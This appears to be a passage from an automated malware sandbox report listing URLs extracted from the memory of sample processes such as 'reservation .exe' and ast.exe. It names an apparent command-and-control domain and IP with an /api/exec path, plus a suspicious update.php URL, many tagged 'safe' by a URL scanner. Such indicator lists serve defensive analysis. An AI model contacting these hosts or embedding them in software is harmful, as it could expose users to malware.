                          http://www.borland.com/namespaces/TypesE0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai.dllM0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443gK0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443g=0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443mm0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443ata0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai.dllI0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesn0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesu0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai)0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443lnw#0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443...0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443g10%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai000%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443lndm0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aieY0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:44335...0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aidll0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443...4335AW0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aidllm0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443gh0%Avira URL Cloudsafe
                          https://id.xn-0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          id.xn--80akicokc0aablc.xn--p1ai
                          		212.193.169.65
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://id.xn--80akicokc0aablc.xn--p1ai:443/api/execfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://id.xn--80akicokc0aablc.xn--p1ai:4439c0ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUreservation .exefalse
                                		high
                                http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Typesast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpfalse
                                  		high
                                  https://id.xn--80akicokc0aaiast.exe, 0000000A.00000003.3183555638.0000000005C68000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://id.xn--80akicokc0aablc.xn--p1ai:443gast.exe, 0000000A.00000003.2784033119.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2807629713.0000000005C27000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://id.xn--80akicokc0aablc.xn--p1ai:443lndast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://id.xn--80akicokc0aablc.xn--p1aiheGuast.exe, 0000000A.00000002.3325486557.0000000007E9D000.00000004.00000010.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0rreservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.indyproject.org/ast.exe, 0000000C.00000003.2953257211.0000000002DDD000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://id.xn--80akicokc0aablc.xn--p1aie03ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://id.xn--80akicokc0aablc.xn--p1ai:443/stClnstClnast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://curl.haxx.se/docs/http-cookies.html#ast.exefalse
                                          		high
                                          https://id.xn--80akicokc0aablc.xn--p1ai:443lnJm&ast.exe, 0000000A.00000003.2895297263.0000000005C36000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://datatracker.ietf.org/ipr/1526/ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmpfalse
                                            		high
                                            https://id.xn--80akicokc0aablc.xn--p1ai:44335-ast.exe, 0000000A.00000002.3309198121.0000000003122000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.remobjects.com/psreservation .exe, 00000000.00000003.2037832146.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, reservation .exe, 00000000.00000003.2037382869.0000000002640000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000000.2039348105.0000000000401000.00000020.00000001.01000000.00000004.sdmp, reservation .tmp.3.drfalse
                                              		high
                                              https://id.xn--80akicokc0aablc.xn--p1ai4j1ast.exe, 0000000A.00000003.3034764637.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://curl.haxx.se/docs/copyright.htmlDast.exe, 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpfalse
                                                		high
                                                https://id.xn--80akicokc0aablc.xn--p1aiexe03ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://id.xn--80akicokc0aablc.xn--p1aifgGuast.exe, 0000000A.00000002.3325606674.000000000889D000.00000004.00000010.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.innosetup.com/reservation .exe, 00000000.00000003.2037832146.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, reservation .exe, 00000000.00000003.2037382869.0000000002640000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000000.2039348105.0000000000401000.00000020.00000001.01000000.00000004.sdmp, reservation .tmp.3.drfalse
                                                  		high
                                                  https://id.xn--80akicokc0aablc.xn--p1aim;ast.exe, 0000000A.00000002.3322683873.0000000005C68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://id.xn--80akicokc0aablc.xn--p1ai:443-ast.exe, 0000000A.00000003.3073381090.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://id.xn--80akicokc0aablc.xn--p1ai:443/ast.exe, 0000000A.00000003.3299966293.0000000005C39000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C39000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://id.xn--80akicokc0aablc.xn--p1aierWast.exe, 0000000A.00000003.2914715160.0000000005BFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://id.xn--80akicokc0aablc.xn--p1ai:4432ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://id.xn--80akicokc0aablc.xn--p1ait.exejeast.exe, 0000000A.00000003.3034764637.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://id.xn--80akicokc0aablc.xn--p1aigetast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443lnast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3320611390.0000000005BE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443lnmmast.exe, 0000000A.00000003.3034764637.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443/stClnD956Cast.exe, 0000000A.00000003.3299966293.0000000005C39000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://id.xn--80akicokc0aablc.xn--p1aiast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3324461869.0000000006A0C000.00000004.00000001.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337372696.000000006C946000.00000004.00000001.01000000.0000000F.sdmp, ast.exe, 0000000A.00000003.2835407797.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073203061.0000000005C5B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005BF2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3034431813.0000000005C80000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3300702932.0000000005C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://id.xn--80akicokc0aablc.xn--p1aigiGuast.exe, 0000000A.00000002.3324808318.0000000006D4D000.00000004.00000010.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://id.xn--80akicokc0aablc.xn--p1ai:44335yast.exe, 0000000A.00000002.3307636336.0000000002EEB000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sreservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drfalse
                                                            		high
                                                            http://www.borland.com/namespaces/Typeswast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.borland.com/namespaces/Typesyast.exe, 0000000B.00000002.2871829583.0000000000D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443dmast.exe, 0000000A.00000003.2895297263.0000000005C36000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914306157.0000000005C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://jrsoftware.github.io/issrc/ISHelp/isxfunc.xmlreservation .tmp, 00000004.00000003.2454431247.000000000372F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://id.xn--80akicokc0aablc.xn--p1ai:44335ast.exe, 0000000A.00000003.3073381090.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3307636336.0000000002EEB000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443...43ast.exe, 0000000A.00000002.3307636336.0000000002EE3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://id.xn--80akicokc0aablc.xn--p1aiZast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://id.xn--80akicokc0aablc.xn--p1ait.exeast.exe, 0000000A.00000003.2914715160.0000000005BFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/soap/encoding/exeast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.borland.com/namespaces/Typesbcryptast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://datatracker.ietf.org/ipr/1524/ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                  		high
                                                                  https://id.xn--80akicokc0aablc.xn--p1aid003ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://id.xn--80akicokc0aablc.xn--p1ainkExast.exe, 0000000A.00000003.3007753831.0000000005C36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://id.xn--80akicokc0aablc.xn--p1aiiast.exe, 0000000A.00000002.3307636336.0000000002EF2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://id.xn--80akicokc0aablc.xn--p1aidast.exe, 0000000A.00000003.2895606355.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2807379986.0000000005C00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.openssl.org/)ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                    		high
                                                                    https://id.xn--80akicokc0aablc.xn--p1aieast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://id.xn--80akicokc0aablc.xn--p1ai3ast.exe, 0000000A.00000002.3306161257.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://id.xn--80akicokc0aablc.xn--p1ai:443gEast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2895606355.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://id.xn--80akicokc0aablc.xn--p1ai:443gDast.exe, 0000000A.00000003.3007986036.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://ocsp.sectigo.com0reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drfalse
                                                                      		high
                                                                      http://solicecare.website/de37/update.phph?ast.exe, 0000000C.00000002.2955493951.0000000002850000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.openssl.org/Vreservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2457697380.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://id.xn--80akicokc0aaast.exe, 0000000A.00000003.3035050247.0000000005C35000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3007753831.0000000005C36000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265864125.0000000005C70000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://id.xn--8Xast.exe, 0000000A.00000003.3265864125.0000000005C69000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443g=ast.exe, 0000000A.00000002.3306161257.0000000000D73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443gWast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3007986036.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://id.xn--80akicokc0aablc.xn--p1aiIast.exe, 0000000A.00000002.3306161257.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drfalse
                                                                            		high
                                                                            https://id.xn--80akicokc0aablc.xn--p1ai.dllC;1ast.exe, 0000000A.00000003.3299122357.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3322683873.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3300702932.0000000005C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.borland.com/namespaces/TypesEast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://id.xn--80akicokc0aablc.xn--p1ai.dllMast.exe, 0000000A.00000003.3267513698.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005BF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://curl.haxx.se/docs/http-cookies.htmlast.exe, ast.exe, 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpfalse
                                                                              		high
                                                                              https://id.xn--80akicokc0aablc.xn--p1ai.dllIast.exe, 0000000A.00000003.2914715160.0000000005BFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443ataast.exe, 0000000A.00000003.3007753831.0000000005C36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443gKast.exe, 0000000A.00000003.2895606355.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073381090.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3267513698.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.borland.com/namespaces/Typesnast.exe, 0000000B.00000002.2871829583.0000000000D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443mmast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.borland.com/namespaces/Typesast.exe, 0000000A.00000002.3306161257.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2871829583.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000C.00000002.2954858422.0000000000C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://sectigo.com/CPS0Breservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.borland.com/namespaces/Typesuast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://curl.haxx.se/Vast.exe, 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpfalse
                                                                                    		high
                                                                                    https://datatracker.ietf.org/ipr/1914/ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                      		high
                                                                                      https://sectigo.com/CPS0Creservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://sectigo.com/CPS0Dxcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drfalse
                                                                                          		high
                                                                                          https://id.xn--80akicokc0aablc.xn--p1ai)ast.exe, 0000000A.00000002.3307636336.0000000002EF2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://id.xn--80akicokc0aablc.xn--p1ai:443ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2835407797.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C35000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2807629713.0000000005C27000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914306157.0000000005C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443lnw#ast.exe, 0000000A.00000002.3320611390.0000000005BE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443...ast.exe, 0000000A.00000002.3324461869.0000000006A0C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443g1ast.exe, 0000000A.00000003.3265137068.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3267513698.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443lndmast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443...4335AWast.exe, 0000000A.00000002.3307636336.0000000002EE3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.sqlite.org/copyright.html.reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873934994.0000000061EA0000.00000008.00000001.01000000.0000000D.sdmpfalse
                                                                                                		high
